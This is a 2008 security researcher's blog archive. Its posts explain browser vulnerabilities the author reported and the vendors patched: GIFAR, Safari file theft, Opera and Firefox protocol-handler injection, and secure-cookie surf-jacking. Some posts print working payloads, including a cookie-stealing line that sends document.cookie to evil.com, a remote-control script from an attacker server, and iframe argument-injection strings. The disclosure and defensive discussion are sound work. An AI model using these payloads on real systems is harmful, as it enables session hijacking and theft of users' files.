Tuesday, December 16, 2008

SUN Fixes GIFARs

Last week, Sun released a patch for a vulnerability I reported to them.  The patch I’m talking about fixes the “GIFAR” issue.  I was unable to speak on the issue at Black Hat (for various reasons), but Nate McFeters did a great job of presenting the concept of GIFARs at Black Hat USA along with a simple example of how an attacker could use a GIFAR in an attack.  Now that the issue has been patched, I’d like to cover some of the things related to “GIFARs” that I thought were interesting (including a few items that were not mentioned at Black Hat).

Before we begin, I’d like to thanks Chok Poh from Sun’s Security team.  Chok was vital in fixing the GIFAR issue.  This patch required some significant thought as to how to best handle this issue.  Chok was very responsive and was smart enough to understand the impact of the unusual issue.  I’d also like to thank the Google Security team.  Google was our “guinea pig” for testing some of the pieces related to GIFARs and despite having to redesign some of their application behavior, they were gracious and very worked diligently to protect their users.  Now, on to the show!

As shown by Nate at Black Hat, creating the GIFAR is simple, we simply use the “copy” command on Windows or the “cat” command on *nix.  There are a few different places that talk about this technique (pdp has a great write up), but I first learned of the technique from Lifehacker.com in this post.  Once the GIFAR is created, we examine the file in a HEX editor.  The header of the file looks something like this:

header

The footer looks something like this:

Footer

We now have a file that is both a valid GIF and valid Java JAR.  We now upload our GIFAR to our victim domain (in this case Google’s Picasa Web).  Google attempts to ensure the file is a valid GIF (which it is) and takes ownership of the GIFAR on their domain.  Once Google has taken ownership of the GIFAR, I can reference the applet on my attacking page via the APPLET tag.  I think the items above were well covered at Black Hat and it is these concepts that represent the essence of a generic GIFAR attack… but Google is smart and they understood the dangers of insecure content ownership before GIFAR, so let’s looks at how we bypassed these Google specific protections.

When we first examined the GIFAR we uploaded to Picasa Web, it wasn’t actually served from the google.com domain.  The actual domain it was served from lh4.ggpht.com.  Below is a screenshot of the domain Google was using to serve the user supplied images.

Google Alias

After some investigation, we realized that ggpht.com was actually an alias for google.com.  So, we could manually change our request from lh4.ggpht.com to lh4.google.com.

lh4.google.com

Bingo!  Now we are on a google.com domain!  From here, a lot of attackers begin to think “Java has raw sockets…”.  It’s one of the first avenues we approached, but we quickly discovered that raw sockets aren’t as useful as other techniques.  Instead of raw sockets, we chose to use Java’s HTTPUrlConnection object.  We chose the HTTPUrlConnection object for two very good reasons.  The first reason is HTTPUrlConnection uses the browsers cookies when making request to domains.  So, if our applet is stored on lh4.google.com and the user is signed into Google, we get to piggy back off the victim’s cookies.  We’ll get to the second reason here in a bit.

httpurlconnection1

Now, even though we are now on the google.com domain, we still have a problem.  The Java Same Origin Policy allows the applet to connect back to the domain that served the applet (I’ve covered this behavior before in previous posts).  Considering the applet was served from lh4.google.com, the attacker is allowed to use the applet to connect back to lh4.google.com and only lh4.google.com.  The problem here is lh4.google.com doesn’t store anything interesting.  This problem leads us to the second reason we chose the HTTPUrlConnection object.

Java’s HTTPUrlConnection object has a method named “setRequestProperty”.  Using setRequestProperty we can set arbitrary HTTP headers for our GET and POST requests.  We use the setRequestProperty to set the HOST header for the HTTP request, allowing us to “jump” from the lh4.google.com domain to any other google.com sub domain.  As a simple example, I had discovered a contact list at http://groups-beta.google.com/groups/profile/contacts?out=&max=500 (Google has removed this contact list).  I set the URL object passed to the HTTPUrlConnection object to http://lh4.google.com/groups/profile/contacts?out=&max=500.  I also set the HOST header to groups-beta.google.com.

host

When the request is made, Java checks the value of the URL object to ensure the Same Origin Policy is enforced.  Since the domain of the URL object is lh4.google.com, everything checks out and Java lets the request through.  Once Google receives the request, it checks the HOST header to determine where the resource should be served from.  The HOST header specifies that the resource should be served from groups-beta.google.com, so despite the fact that the URL points to lh4.google.com, Google serves the contact list from groups-beta.google.com.  In this example, I stole a user’s contact list but it could have been any content from a number of Google sub domains.

All your contacts are belong to us

It’s easy to blame Java (Sun) for this issue.  After all, it was their JRE that had a relaxed Jar parsing criterion which allowed GIFARs to be passed as Jars.  In many respects some blame could be placed on Sun, but in my opinion (as humble as it is), this is ultimately a web application issue.  When a web application chooses to take ownership of a user controlled file and serves it from their domain, it weakens the integrity of the domain.  This isn’t the first time an image was repurposed like this, IE has had MIME sniffing issues with images, Flash had crossdomain.xml issues with images, and now we have GIFARs.  The impact of these attacks could have been minimized if web applications that took user controlled files served those files from a “throw away” domain.  As an application developer, you can prevent these types of attacks in the future by using a separate domain for user influenced files.

Tuesday, November 18, 2008

Stealing Files with Safari

Apple recently patched a vulnerability Nitesh "Leisure Suit" Dhanjani and I reported to them last week (CVE-2008-4216).  We had reported a similar vulnerability to Apple about two months ago (CVE-2008-3638).  In fact, the exploitation technique was so similar we held off releasing details until this 2nd patch was released.

The basic gist of this vulnerability pits a browser and a browser plug-in against each other in order to cross a subtle, but important boundary.  The issue starts simply enough with a victim visiting an attackers webpage.  Once on the attacker’s webpage, the attacker simply loads a Java Applet.  Inside of the applet is a call to getAppletContext().showDocument(URL);



getAppletContext().showDocument(URL) basically has the browser open a new browser window with the URL passed to showDocument().  Normally, browsers will not let remote sites open new browser windows which point to local files.  It seemed that Safari had some issues determining the specific  “rights” for windows opened via Java Applets and allowed getAppletContext().showDocument() to force the browser to open a file from the user’s local file system. 

Now here is where things get interesting…  Opening a local file in the browser isn’t very useful unless we can open and render/execute content that we control.  There are a couple ways plant our content in a predictable location using Safari.  Safari, by default has a reasonably predictable location for cached/temporary files.  We can use these predictable locations to load our content, we’ll have some guessing to do, but it works…  Safari can also be forced to dump user controlled contents to the “c:\temp” directory (in Windows, of course), which makes thing far more predictable making the attack a lot less noisy.  I’m not sure if Apple considers the “c:\temp” issue a bug, but just in case they do I won’t go over the details for the “c:\temp” trick just yet.

In case you’re wondering, Internet Explorer and FireFox use a random, 8 character directory name to prevent guessing of temporary file locations.

Once we’ve planted our contents to a predictable location, it’s now simply a matter of having the Java Applet call the file we’ve planted.  We have unlimited guesses to get the location and file name right, but the more guesses the more noisy the attack (obviously).  The file we’ve planted is an HTML file which loads an XMLHTTP object, which is used to steal files from the local file system.  You can include a <script src=”http://attacker-server/remote-control.js></script> if you want to remotely control the script running on the local file system.  Safari allows script to be executed from local files without warning, so once we get the right location and filename for our planted HTML file, files can be stolen off the local file system without user interaction or warnings.



Internet Explorer presents a warning before executing script from local files and FireFox (as of FireFox3) restricts XMLHTTP loaded from the local file system to the directory the html file was loaded from (and  any subdirectories).



Once we have the contents of the file in JavaScript space, we simple encode the contents and POST the contents to our attacker web server.  There you go... Stealing Files with Safari!

Pwnichiwa from PacSec!

WOW, it’s been a busy couple of weeks!  I was in Tokyo last week for PacSec.  PacSec was a great time, there were some GREAT talks, and Dragos knows how to party!  I co-presented a talk entitled “Cross-Domain Leakiness: Divulging Sensitive Information and Attacking SSL Sessions” with Chris Evans from Google.  I’m curious if this was the first time in history a Google Guy and a Microsoft Guy got on stage together and talked about security...  Anyway, you can find the slides here:

Chris is a super smart guy and demo’d a ton of browser bugs, most of which he will eventually discuss on his blog (which you should check out).  I had a chance to demo a few bugs and went over some techniques to steal Secure Cookies over SSL connections for popular sites.  Now, before I get into the details of the Safari File Stealing bug that was recently patched (provided in the next post) I did want to talk a bit about WebKit.

<WARNING Non-Technical Content Follows!>

You were warned!  Some friends and I have been playing around with Safari (we've got a couple bugs in the pipeline).  As everyone knows, Safari is based on the WebKit browser engine.  I think WebKit is a great browser engine and apparently so does Google because they use it for their Google Chrome.  So, once I discover and report a vulnerability in Safari for the Windows, Apple must also check Safari for Mac, and Safari Mobile for iPhone.  Additionally, “someone” should probably let Google know as their Chrome browser also takes a dependency on WebKit.  Now, who is this “someone”?   Is it the researcher?  Is it Apple?  Does the researcher have a responsibility to check to ensure this vulnerability doesn’t affect Chrome?  Does Apple have a responsibility to give Google the details of a vulnerability reported to them?  Our situation works today because we’ve got great people working for Apple and Google (like Aaron and Chris) who have the means to cooperate and work for the greater good.  However, as security moves higher and higher on the marketing scorecards and becomes more and more of a “competitive advantage” at what point will goodwill stop and the business sense take over?

Let’s contemplate a scenario that isn't so black and white…  Let’s say two vendors both take a dependency on WebKit.  An issue is discovered, but the differences in the two browsers make it so that the implementation for the fix is different.  Vendor A has a patch ready to go, Vendor B on the other hand has a more extensive problem and needs a few more days/weeks/months.  Should Vendor A wait for Vendor B to complete their patch process before protecting their own customers and pushing patches for their own products?

Let’s flip the scenario… Let’s say Vendor A has a vulnerability reported to them.  Vendor A determines that the issue is actually in WebKit.  Vendor A contacts Vendor B and discovers that Vendor B isn’t affected… does this mean Vendor B knew about issue, fixed the issue, and didn’t tell Vendor A?  Do they have a responsibility to?

Tuesday, October 21, 2008

House Keeping

It’s been a crazy couple weeks! Some quick housekeeping:

ChicagoCon – I’ll be in Chi-Town next week giving one of the Keynotes at ChicagoCon. If you’re going to be in the area, hit me up and we’ll grab a few drinks.

Bluehat - I’m glad to see all the young blood in the scene. It’s going to be scary to see what Kuza55 and Sirdarckcat are up to in 10/15 years (they’re already tearing stuff up as it is…). As for us old guys, we can’t drink like we used too… but we still try :)  As usual, the Bluehat parties ROCKED and it was great meeting everyone.  We topped off all the Bluehat debauchery with a night at the shooting range, shooting AR-15s and various handguns…

MBA - I actually took a Midterm during the WAF discussion panel at Bluehat (no wonder I was soooo quiet). Once this class is over, I’ll have 3 more classes to go and I’ll have completed my MBA! The coursework isn’t too bad, but the time commitment is pretty high. It definitely cuts into my “pwnage time” and I can’t wait till it’s all over. Don’t ask me why I need another Masters degree and don’t ask me how many times I’ve XSS’d my online class discussion forums. I promise to practice responsible disclosure after my classes are over... but for now, its the only thing that keeps class bearable :)

Grey Goose - This was an AWESOME project and I’m glad Jeff Carr asked me to participate. Jeff basically assembled enough Intel brain power to rival an Intel agency of a small country. Jeff put out a couple reports and if you need more info on the project, you can find it here. I studied warfare as an Officer in the Marine Corps (Maneuver and Expeditionary) and I'm interested in anything related to cyber warfare. We’re living in a time when the tactical, operational, and strategic thinking surrounding cyber warfare is being defined.  We can already see striking similarities between cyber capabilities and air power. Just as air power added a new dimension to modern warfare, so do cyber capabilities. Many typically view Computer Network Attack (CNA) and Computer Network Exploitation (CNE) as solitary events, but they can also be used in “combined arms” scenarios (much like targeted air strikes vs close air support).  One day doctrine related to cyber warfare will be required reading for young military officers, just like Sun-tzu, Clausewitz, and Jomini.

Apple Pwnage – Nitesh and I reported a vulnerability to Apple (CVE-ID: CVE-2008-3638). I’ll go over the details on the blog as soon as some loose ends get tied up.

Win7 – I finally took the advice of Rob Hensing and Dave Weston and switched to Win7 as my primary OS…. So far, it absolutely ROCKS.

Great talk by a respected haxor....http://video.google.com/videoplay?docid=-1012125050474412771&hl=en

Tuesday, September 23, 2008

Surf Jacking Secure Cookies

I was thinking back to Sandro’s paper on Surf Jacking and I realized that there was one small caveat where the “Secure” flag wouldn’t protect your cookies from Surf Jacking…

The Side Jacking and Surf Jacking techniques basically stipulate that the attacker has to be on the same network segment as the victim (you have to be able to sniff the traffic in order to see the cookie go by on the network)… So I’ll stipulate the same.

Say I go to https://xs-sniper.com and xs-sniper.com sets a cookie, but sets it with the “Secure” flag.  An attacker could eventually force my browser to load a non-secure version of xs-sniper.com (http://xs-sniper.com) in an attempt to force my session cookie to travel in the clear so they can sniff the cookie as it goes by (this is a simplified description of Surf Jacking).  Now, if all my cookies are set secure, my cookies won’t travel over the wire in the clear…  I’m safe… right?

Not so fast…  If application sets all the cookies with the secure flag, BUT the web application also has a “script src” tag pointing to an insecure location (http://) then you can STILL STEAL THE COOKIE, even if its marked secure.   Let me explain…

If an attacker is on the same network segment as you, not only can they sniff clear text data (http://) they can also INJECT data as it traverses the network.   Let’s say I have a page on xs-sniper.com that does analytics for my web application.  We’ll name this page http://xs-sniper.com/analytics.html.  This page is meant to be served as http:// and contains no sensitive data, but if a user makes a direct request for https://xs-sniper.com/analytics.html the page is still served.  Inside of the page’s HTML is a script src tag that looks something like this:


<script src="http://myanalytics.com/webbugs.js"></script>


Now, using the surf jack technique, Sandro redirected the victim to an http:// version of the targeted site.  In our case, redirecting to an insecure version of the site doesn’t help us as all the cookies are set SECURE.  Instead, we’ll redirect to an https:// page on our victim domain that contains an insecure script src tag like the one shown above (https://xs-sniper.com/analytics.html).  Once we see the request for the insecure javascript file (webbugs.js) file, we can inject our own javascript cookie stealing payload (as the script src request is made in the clear):


CookiesStealer = new Image();

CookiesStealer.src = “http://www.evil.com/stealer.jpg?”+document.cookie;


The injected script is executed by the page that loaded it and gives up the cookies for the domain, even if they are marked secure.  There you go… Secure cookies stolen.

Without warning or prompt, every browser I tested allowed an https:// page to load a script src from an insecure http:// location.  Ok... I lied... every browser EXCEPT ONE... can you guess which lonely browser provided a warning before allowing an https:// page to load a script from an http:// location?  You can find the answer here.  For those of you in disbelief, you can test your favorite browser(s) here.

SIDENOTE: HTTP pages that call document.cookie will NOT have access to SECURE cookies… well at least in the browsers that I checked... that's pretty cool...

CLARIFICATION ON SIDENOTE: From my tests (which only covered a few browsers) it seems that the document.cookie object called from an http:// page WILL NOT contain secure cookies (this is a GOOD thing). So, if I were able to inject a full http:// page and called document.cookie, the secure cookie would be missing. This is why I needed to call an https:// page with a script src that loaded an insecure script file.

Sunday, September 14, 2008

Hostile Hotel Networks?!?!

Dark Reading recently had an interesting article related to the security of Hotel networks; you can find the article I'm talking about here.

As I read the article... I couldn't help but smile... the article made it seem like Hotels have horribly insecure networks!  The truth is, THEY DO…along with airports, coffee shops, bookstores and pretty much ANY PLACE that offers up connectivity!

Some people fail to understand that when you join ANY network, you’re trusting that everyone on the network is playing nicely.  Many of the protocols that enable our network connectivity WERE NOT DESIGNED TO SECURELY SUPPORT THE SCENARIOS WE DEMAND TODAY.  Take for example, Address Resolution Protocol (ARP).  ARP is the one protocol that really makes me paranoid.  The details of how ARP works and how it can be used to do evil is way beyond the scope of this post, but you find some good information here, here, and here.

The ARP abuses I'm most interested in are ARP Poisoning attacks.  These attacks basically allow me to Man-in-the-Middle (MITM) network connections, typically from a victim’s machine to their gateway.  Now ARP poisoning attacks have one MAJOR drawback (from an attacker standpoint), they typically require the victim to be on the same network as the attacker (in layman’s terms).  Ask yourself this question.... why would I ever join an un-trusted network and possibly subject myself to such attacks? 

Surprisingly, people join un-trusted networks all time.  If you've ever associated to a wireless access point at a coffee shop, hotel, bookstore, or an airport.... you've joined an un-trusted network… IT’S THAT SIMPLE.  Just because the SSID and the welcome page has a familiar name/logo that you trust, THAT DOESNT MEAN THAT YOU CAN TRUST EVERYONE ELSE CONNECTED TO THAT NETWORK, and if you can’t trust everyone connected to the network, then you’ve got yourself an un-trusted network.  Now, MITM on “secure” connections (SSL aka HTTPS) usually causes a warning to appear (every major browser has this protection mechanism in place), and while I haven’t seen any studies on click through rate, I would guess that it’s pretty high.





Airports are a PRIME target for MITM, as they are typically filled with people using the available wireless access points to do business.  Many of these people are not technically savvy and more importantly, THEY ARE IN A HURRY, which brings them to push past warning message after warning message in order to "get this out before my plane leaves!"  If someone wanted to harvest a TON of sensitive information (creds to banking accounts, usernames, passwords, emails... everything you can possibly imagine), all they would have to do is connect to the airport wireless network, ARP poison every host they see... and let the creds roll in.  It's that simple... trust me...  I've seen it firsthand...  I can guarantee that you'll have someone’s creds within 5 minutes...

Security pros will argue, “you can use a VPN” and they are right.  If you are a corporate user, you shouldn’t even THINK about sending anything through an external, un-trusted network unless it’s through the VPN… but what about the home user?  What about mom and pop, traveling on vacation… where is their VPN?  Judging from the success of these attacks, even if a stern warning is presented, many users just ignore the warnings and continue on their merry way.  Scores of software will silently ignore certificate warnings, happily passing information onto a suspect host.  Besides, those warnings are only displayed when encryption is in play, so that unsuspecting user that is browsing their webmail over HTTP gets their session stolen without warning.  It's truly amazing how noisy our computers have become, spitting out all sorts of info... trusting that everyone else on the network is playing nicely.

Let’s say you understand the risks of MITM and you have to email something out before your plane leaves.  You attempt to connect to your VPN server and you see a certificate warning.  You suspect that someone may have an MITM against you using ARP Poisoning... what can you do to protect yourself and still get the email out?

Monday, September 8, 2008

Simple Lesson on Secure Cookies

I recently read a paper written by Sandro Gauci from Enable Security entitled "Surf Jacking - HTTPS will not save you". You can find the paper here.

It's an interesting read and extremely relevant to today’s web applications.  The heart of the paper describes some simple tricks to force a session cookie to be sent over a non encrypted channel.  These tricks are possible if the secure flag isn’t set for the session cookie. These types of attacks have been discussed before. Side Jacking is probably the most well known (and most widely used) attack against leaked cookies.

<RANT> It bugs me that we’re still dealing with issues like this.  Despite having a simple and effective means to ensure that session cookies are only sent over secure channels, application owners choose to ignore the secure (and HTTPONLY) flag when developing their applications.  Later, as the application matures, developers find that their application has taken a significant dependency on this insecure behavior and what was once a simple fix now becomes a huge design change (which equals $$$).  The true victim's to these poor security decisions are the users who are left scratching their heads when their accounts get pwnd while using the WiFi at Joes Coffee shop. </RANT>

I believe the secure flag is symbolic of the current state of web application security… the countermeasures to the issues we are facing are known, simple, and effective... yet we continue to struggle on wide scale implementation because we've taken dependencies on insecure behavior.  SSL certs are another great example of this.  Every major browser has a way to bypass the security provided by SSL certs.  Browsers MUST offer this bypass because if they didn't, it would break the web... but i digress.

There is a bright spot when it comes to the protecting cookies.  Cookies are stored and protected by the browser (as any decent web app hacker should know!).  So, when an application server issues a "SET-COOKIE" header, it's merely a recommendation as to how the browser should use the cookie.  Each cookie is maintained by the browser and all the flags (secure, path, domain, httponly, expires...etc) associated with cookies are enforced ENTIRELY by the browser.  So, if an application server sets a cookie WITHOUT the secure flag, I can tell my browser to disregard the servers recommendation and add the secure flag which ensures that the cookie will only be sent over secure channels.  This is really simple stuff, so seasoned web app hackers can stop here. Everyone else can continue reading.

I've set up a page on here that simply sets a cookie in the following manner:

Set-Cookie: XSSniper=BKRios; expires=CURRENTDATE

Examining the Cookie in FireFox shows the following:

Bad Cookie!

As you can see, we have a cookie named XSSNIPER and the SECURE flag was NOT set by the server.  In fact, my server will NEVER set the secure flag for the XSSNIPER cookie.  Now if I want to force my browser to enforce the secure flag for the XSSNIPER cookie, I can do so by entering the following Javascript into address bar.

javascript:var cookies=unescape(document.cookie);var split=cookies.split(";");for (i = 0; i <split.length;i++){document.cookie=split[i]+";expires=Thu,1-Jan-1970 00:00:00 GMT;";document.cookie=split[i]+";secure;"}document.location="http://xs-sniper.com/blog";

The Javascript above expires all of the current cookies (only on the client side, if you had a session established with the server it would still be maintained) and sets every cookie for the current domain to secure.  I realize the Javascript is pretty ghetto, this should ideally be handled by application, but we could also use a browser plugin with a nice UI and fine grained control over each cookie attribute... Hmmmm a tool to prevent Surf/Side Jacking attacks... I wonder what I would call it... Any ideas Nate?

After we run the Javascript, we can take another look at the Cookie info presented by Firefox:

Secure Cookies for everyone!

As you can see, the cookie will only be sent over encrypted connections and the cookie now expires at the end of the session (no more persistence).  We've turned the XSSNIPER cookie into a SECURE cookie, despite the fact that the server never specified this behavior.

Now, this approach does have it cons... Servers typically recommend a particular cookie setting because the application was designed to work/anticipate/depend on those characteristics.  This will probably break some application functionality, but broken functionality will show you exactly where your cookie would have been leaked :)

Wednesday, September 3, 2008

IE8b2 XSS Filter

I run a number of different browsers, for various reasons.  I was once even called a “browserholic” by a colleague!   I pulled down IE8b2 when it went live a week ago.  I don’t want to talk about the myriad of security features or browsing features as I think they’ve been covered in detail by many different sources, but I do want to mention one security feature… XSS Filter

XSS Filter was created by David Ross… he’s one of the smartest guys I’ve ever met.  In addition to being super smart, there is a certain boldness needed to take the lead in developing Internet Explorer’s built-in defense for the bane of the web.  David asked a number of security pros around the world to take a look at XSS Filter and I’m honored to have been asked to help.  You can see some of the names of those who participated in XSS-Filter’s creation here.


Thanks David and CONGRATS on the release!


Some technical details with regards to XSS-Filter can be found here.

Thursday, August 21, 2008

Opera Stuff - Followup

It always takes me a few weeks to work the booze out of my system after Blackhat and Defcon... but on the show...

 

Opera 9.52 was released a few days ago...  I hope you've upgraded!  Working with the Opera Security Team was a pleasure.  I think they have the most creative way of tracking each bug (by email address) and they were VERY responsive. 

 

A while back, I reported an issue to the Opera Security Team about some Opera protocol handling abuse I came across.  You can read the initial advisory here.  Now, when the initial advisory went out, the Opera Security Team asked me to hold off on the details until they published a follow up advisory, which can be found here.  Since the issue is patched and the second advisory is out, lets go over the details:

 

First of all... this is a cross application issue (I think Blended Threat is the sexy term being used these days).  We'll use a protocol handling "aware" application to launch these attacks against Opera.  Opera just has to be installed someplace on the victim's machine for this to work.

 

When a user installs Opera, the following protocol hanlder is registered:

 

Opera.Protocol  "C:\Program Files\Opera\Opera.exe" "%1"

 

Which means.. when I call Opera.Protocol://test, the following basically gets passed to the command line (this is a simplified explanation, but hey... I'm a simple guy).

 

c:\Program Files\Opera\Opera.exe "Opera.Protocol://test"

 

Knowing this and determining that no internal check is done to distinguish between protocol handling and command line access, we are free to inject arbitrary arguments, which will be passed to Opera.  In the first example, we will inject the location of a local html file.  When the html file is loaded a warning will be presented to the user, but the contents will be rendered regardless of the user decision.  The protocol handling string we use looks like this:

 

<iframe src =  'opera.protocol:www.test.com" "file://c:\test.html '>

 

which ends up executing the following:

 

c:\program files\opera\opera.exe "opera.protocol:www.test.com" "file://c:\test.html"

 

If we can somehow place an html file to a known location this would be bad.  For arguments sake, lets assume Nate Mcfeters didn't figure out a way to drop arbitrary content to a known location a few days ago (did I say that outloud?) ... what else can we do?

 

Taking a look at the command line arguments supported by Opera, we see a couple interesting items... one of which is the "/settings" argument.  the "/settings" argument allows for Opera.exe to be loaded with an arbitrary INI file.  A quick examination of what's contained in an Opera INI file shows that if we can control the contents of the INI file, then we can control:  Cache directories, debugging mode, proxy settings, script execution, java behavior, whether items are automatically RUN after downloading... the list goes on and on...

 

<iframe src =  'opera.protocol:www.test.com" /settings "//attacker-ip/ini-file.ini '>

 

which will result in something like this:

 

c;\program files\opera\opera.exe "opera.protocol:www.test.com" /settings "//attacker-ip/ini-file.ini"

 

OUCH....Thankfully... the Opera Security Team has fixed this particular issue!  Kudos to them!

Sunday, July 20, 2008

A Look at MFSA 2008-35

As promised... a quick look at MFSA2008-35

 

When FireFox is installed, it registers the following protocol handlers:

  • Gopher://

  • FirefoxURL://


gopher is cool!

Note, Firefox3 no longer registers the Gopher protocol handler, which is a great security decision.

 

Both of these protocol handlers point to Firefox.exe in the following manner:

  • "C:\Program Files\Mozilla Firefox\firefox.exe" -requestPending -osint -url "%1"


When Gopher:// or FirefoxURL:// are called, the arguments are passed to the “%1” portion in the string shown above.  For example, gopher://test will result in the following: 

  • "C:\Program Files\Mozilla Firefox\firefox.exe" -requestPending -osint -url "gopher://test"


Knowing that we have absolute control over the –url argument being passed to Firefox.exe, we can use the “|” character to pass multiple, arbitrary URLs to the –url argument.  Firefox has protections against remote web pages from redirecting to file:// and chrome:// content, but in this instance we are passing the URLs via protocol handler.  When arguments are passed via protocol handler, it’s essentially as if we are passing the –url argument to firefox.exe via the command line.  So, thanks to the protocol handlers the file:// and chrome:// restrictions can be bypassed.  This is done in the following manner:

  • gopher:test|file:c:/path/filename

  • gopher:test|chrome://browser/content/browser.xul


Note – It is also possible to pass “javascript://” URIs to Firefox.exe, but javascript URIs passed via the command line will be loaded in the context of about:blank.  This is a great security decision on behalf of Mozilla and saved them from having a standalone sploit.

 

Now that we have the ability to load local content via the protocol handlers registered by Firefox, we must now find a way to plant the attacker controlled content to a known location.  There are a couple ways to plant attacker controlled content to a known location, but I’ll keep it simple (and responsible) and use the recently patched Safari “Carpet Bomb” attack as an example.  When Safari encountered an unknown content type, it would download the content of the file to the user’s desktop.  This gives us a semi known location, as we’ll have to guess the username.  We can send a LOT of guesses for username as demonstrated below. 

  • <html><body><iframe src="gopher:file:c:/path/filename|file:c:/path/ filename2|file:c:/path/ filename3....>


There are other methods that don’t involve guessing the username, but I won’t go into that (remember, it’s the kinder, gentler BK!).

 

So, if a user is browsing the web with Safari and has Firefox installed, I could plant a HTML file with javascript (XMLHTTP) onto the user’s desktop.  Once the content is planted, I can launch the gopher:// protocol handler (gopher is launched by Safari without user consent) and point Firefox.exe to the local content.  When Firefox loads the local content, the XMLHTTP request has access to the entire user file system (as the script was loaded from the local file system). 

 

Firefox3 has implemented security measures to prevent arbitrary file access and limits the XMLHTTP request to the currently loaded directory (and possibly subdirs?), which is a great security decision. 

 

On a side note, IE warns users when active script is about to be run from the local file system.  I believe the IE warning message states, “you are about to do something REALLY stupid… do you wish to continue?” … or something like that.  This is a great security decision on behalf of IE.

 

 

 

The scenario presented above demonstrates how someone with Safari and FireFox installed could get their files stolen, but Mozilla understood that the behavior of their software could be abused by other software (not just Safari), just as Apple understood that dropping files to a user’s desktop (without consent) could be abused by other software as well (not just IE or Firefox).  Both vendors did what was right and adjusted the behavior of their software.  Thanks Mozilla and Apple!

 

These types of issues interest me because it represents the difficulties in securing real life systems, systems that have software from multiple vendors interacting with each other, depending on each other to make the right security decisions.  In isolation, these issues may not be of any concern, but together they create a situation where the security measures of one piece of software is bypassed because of the seemingly innocuous/insecure/stupid behavior of another, seemingly unrelated piece of software.  From what I understand, Mark Dowd and Alexander Sotirov plan to give some INSANE examples of this at Blackhat…  I’m looking forward to the talk!

Wednesday, July 16, 2008

FireFox Vulns - MFSA 2008-35

Mozilla issued a patch related to an issue I recently reported to them.  The MFSA with details on the issue can be found here.  It's an interesting issue that demonstrates some of the complexities related to interaction between software from different vendors.  This particular issue makes use of one of my favorite attack vectors, protocol handlers.  The protocol handlers involved in this situation create an opportunity to pass "a command-line URI with the pipe symbols" from a remote webpage to FireFox.exe.  For those that are interested, I'll provide a small writeup on the issue this weekend.  For those waiting, I'll also provide a writeup on the Opera protocol handling issue leading to RCE when the Opera team is ready.

 

It's a crazy coincidence that the FireFox and Opera vulnerabilities come almost one year to the date after Nate McFeters and I reported the original firefoxurl and mailto protocol handling vulnerabilities... and I use the term "reported" loosely :).  Nate and I have changed over the past year... we're both older and fatter, but it seems that protocol handlers continue to be as vulnerable as ever.

 

In closing, I want to thank the Mozilla Security Team (Dan Veditz in particular) and the Apple Security Team for working with me on this issue.  It would have been easy for them to point fingers at the other organization, but both teams took responsibility for their portion and comitted to changes.  Thanks guys!  I'll buy the beers in Vegas!

Friday, July 11, 2008

Opera Stuff

I recently came across an issue in Opera that could allow for some bad stuff.  Although the issue has been addressed, I've been asked by the Opera security team to hold off on details until they can fully investigate other possibly related issues.  I'll respect that request.  I do however, want to take a moment to thank the Opera team for their timely response!  Change control, resource allocation, and devoting the appropriate amount of testing to patches for sophisticated applications is a tricky business.  The Opera team responded quickly with a patch and kept in great contact with me throughout the process.  

 

It's a crazy world out there and the web browser is the window to the wild wild west.  I wish Opera security team the best of luck!

Married in Maui!



I've been Maui for the last two weeks and it was AWESOME.  My girl and I had our wedding ceremony on a beach in Kihei and our reception "upcountry" in Kula.  It was great being back on the islands, catching up with friends and family. 

 

For some reason, I feel energized... Maybe it was the Hawaii sun or may all those late night hacking sessions were finally catching up...  or maybe I'm just getting old :p ... but I feel good now! 

 

I was pretty much offline for the entire time, so if you've sent me an email within the past week  I'll eventually catch up on my email and respond, otherwise I'll SEE YOU IN VEGAS!!!

Saturday, June 21, 2008

Clarification for "BK on Safari, hunting Firefox…"

Is Safari 3.12 affected by the vulnerability you mention in, BK on Safari, hunting Firefox?  The “carpet bomb” behavior COULD have been used in conjunction with Firefox to steal user files.  This specific scenario has been patched.

 

Can an attacker use other, non-obvious ways to abuse the Safari (3.12)/Firefox interaction to steal files from the local file system?  Yes, I know of three separate methods to accomplish this (Firefox 3 lessens the risk).  Vendors have been informed and no details will be provided to the public.  Don’t ask for additional details, I won’t give them until all this is straightened out.  

 

Whose fault is this?  That’s the whole point of the post.  We have interaction between different software from different vendors.  In isolation, the behaviors that are being abused here are not a high risk.  It’s only when you combine the behaviors does it constitute a risk.  Who should we blame?  I don’t know, I don’t think anyone really knows… lots of people have their opinions though. :)

 

 

 

Thursday, June 19, 2008

BK on Safari, hunting Firefox...

Apple released a patch for their “Carpet Bomb” issue today.  I’m glad to see that Apple took steps to protect their users.  Kudos to the Apple Security team!   

 

There was a lot of discussion about how this behavior could be used in a “blended” attack with IE, but Safari’s behavior affected more than just IE. In fact, I’ve discovered a way to use the Safari’s carpet bomb in conjunction with Firefox to steal user files from the local file system.  Even though Apple has patched the carpet bomb, I’m not going to go into details as the issue is not patched and the behavior may be replicated via other means (it’s the kinder, gentler BK).  I’m also happy to say that some of the improved security features in Firefox 3 help lower (but do not eliminate) the impact of the issue (Firefox 2 users could still be at risk of arbitrary file pwnage). Mozilla is working on the issue and they’ve got a responsive team, so I’m sure we’ll see a fix soon. 

 

  • UNREALTED NOTE TO MOZILLA:  Firefox 3 shouldn’t FORCE itself to be my default browser after I install it (YES, I unchecked the default browser checkbox during install)


 

Now, these types of vulnerabilities are a perfect example of how the all the software and systems we use are part of a giant ecosystem.  Whether we like it or not, the various parts of the ecosystem are intertwined with each other, depending on each other.  When one piece of the ecosystem gets out of line, it can have a dramatic effect on the ecosystem as a whole.  A small vulnerability or even an “annoying” behavior from one piece of software could alter the behavior of 2nd piece of software, which a 3rd piece of software is depending on for a security decision (The recent pwn2own browser -> java -> flash pwnage is a great example of this).  As the ecosystem grows via plugins, functionality, and new software, so does the attack surface.  Eventually, the interactions between systems and software become a gigantic mesh and the attack surface becomes almost infinite.

 

Now, a lot of people have criticized Apple for their inability to see the carpet bombing behavior as a security issue.  If Apple looked at their product (Safari) in isolation, maybe it wasn’t a high risk security issue to them and it was really more of an annoyance… its only when you look at the ecosystem as a whole do we start to see the security implications of this behavior.  Should we have expected Apple to threat model the risks of this behavior against their own products AND other third party products as well?  Can we reasonably expect them (or anyone) to have the requisite knowledge to truly understand how certain behavior will affect the ecosystem? 

 

This brings us to a pressing question.  In the "real world", users install products from multiple vendors.  Whose responsibility is it to examine the interaction between all these products?

Saturday, June 14, 2008

3rd Annual Symposium on Information Assurance


I was recently given the honor of delivering a keynote talk for the 3rd Annual Symposium on Information Assurance, which was held in conjunction with 11th Annual New York State Cyber Security Conference.  It was a great conference and I want to thank Sanjay Goel for inviting me!


 


